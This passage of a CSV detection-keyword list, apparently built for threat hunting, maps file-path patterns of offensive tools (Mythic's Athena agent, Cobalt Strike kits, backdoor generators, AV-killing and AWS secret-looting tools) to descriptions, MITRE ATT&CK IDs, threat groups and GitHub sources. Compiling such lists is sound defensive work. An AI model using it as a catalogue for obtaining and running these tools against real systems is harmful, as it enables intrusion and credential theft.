fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.Profiles.*.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena.sln*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena/Assembly/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/Athena/Commands/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/athena/mythic*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/athena_utils/*.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AthenaPlugins/bin/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AthenaSMB/*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AthenaTests/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/AtlasReaper.git*,offensive_tool_keyword,AtlasReaper,A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.,T1210.002 - T1078.003 - T1046 ,TA0001 - TA0007 - TA0040,N/A,N/A,Reconnaissance,https://github.com/werdhaihai/AtlasReaper,1,1,N/A,3,3,202,21,2023-09-14T23:50:33Z,2023-06-24T00:18:41Z -*/AtomLdr.git*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*/attackercan/*,offensive_tool_keyword,Github Username,github Penetration tester repo hosting malicious code,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008 - TA0011,N/A,N/A,Exploitation tools,https://github.com/attackercan/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/attacks/*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/AttackServers/*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/AttackSurfaceMapper.git*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,1,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*/Augustus.git*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*/auth/cc2_auth.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/auth-owners.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/auth-spoof.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/autobloody.git*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*/autobloody/archive*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*/AutoBypass.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*/AutoSmuggle.git*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*/autotimeliner*,offensive_tool_keyword,autotimeliner,Automagically extract forensic timeline from volatile memory dumps.,T1547 - T1057 - T1003,TA0005 - TA0008,N/A,N/A,Forensic Exploitation tools,https://github.com/andreafortuna/autotimeliner,1,1,N/A,N/A,2,119,23,2023-03-17T07:29:34Z,2018-11-12T16:13:32Z -*/auxiliary/scanner/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/avet.git*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*/avet_fabric.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*/avet_script_config.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*/avoid_badchars.py*,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,1,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*/avred.git*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/avred.py*,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/avred.py*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*/avredweb.py *,offensive_tool_keyword,avred,Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.,T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/dobin/avred,1,1,N/A,9,2,172,19,2023-09-30T12:28:42Z,2022-05-19T12:12:34Z -*/awesome-burp-extensions/*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*/awesome-pentest*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/aws__enum_account*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/aws__enum_account/main.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/AWS-Loot*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*/Azure-AccessPermissions.git*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,1,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*/AzureC2Relay*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*/AzureHound.ps1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/B374K*,offensive_tool_keyword,b374k,This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser,T1021 - T1028 - T1071 - T1105 - T1135,TA0002 - TA0003 - TA0005,N/A,N/A,Web Attacks,https://github.com/b374k/b374k,1,0,N/A,N/A,10,2248,783,2023-07-06T20:23:03Z,2014-01-09T04:43:32Z -*/BabelStrike.git*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*/BabelStrike.py*,offensive_tool_keyword,BabelStrike,The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin),T1078 - T1114,TA0006 - TA0009,N/A,N/A,Credential Access,https://github.com/t3l3machus/BabelStrike,1,1,N/A,1,1,38,13,2023-09-12T13:49:30Z,2023-01-10T07:59:00Z -*/BackDoor*,offensive_tool_keyword,_,keyword observed in multiple backdoor tools,T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001,TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/backdoor.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -*/backdoor/traitor.go*,offensive_tool_keyword,traitor,Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/liamg/traitor,1,1,N/A,N/A,10,6213,494,2023-03-16T16:21:13Z,2021-01-24T10:50:15Z -*/backdoor_all_users.py*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*/backdoor_apk*,offensive_tool_keyword,TheFatRat,Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and dll.,T1027 - T1059 - T1105 - T1218,TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec/TheFatRat,1,0,N/A,N/A,10,8267,2217,2023-06-11T19:16:05Z,2016-07-24T10:30:19Z -*/backoff.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/backorifice-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/backorifice-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Backstab.git,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*/Backstab/Backstab*,offensive_tool_keyword,Backstab,A tool to kill antimalware protected processes,T1107 - T1106 - T1543.004 ,TA0002 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/Yaxser/Backstab,1,1,N/A,N/A,10,1237,216,2021-06-19T20:01:52Z,2021-06-15T16:02:11Z -*/backstab_src/*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,1,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*/BackupOperatorToDA.git*,offensive_tool_keyword,BackupOperatorToDA,From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller,T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/mpgn/BackupOperatorToDA,1,1,N/A,10,4,335,48,2022-10-05T07:29:46Z,2022-02-15T20:51:46Z -*/BackupPrivSam/*,offensive_tool_keyword,cobaltstrike,A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 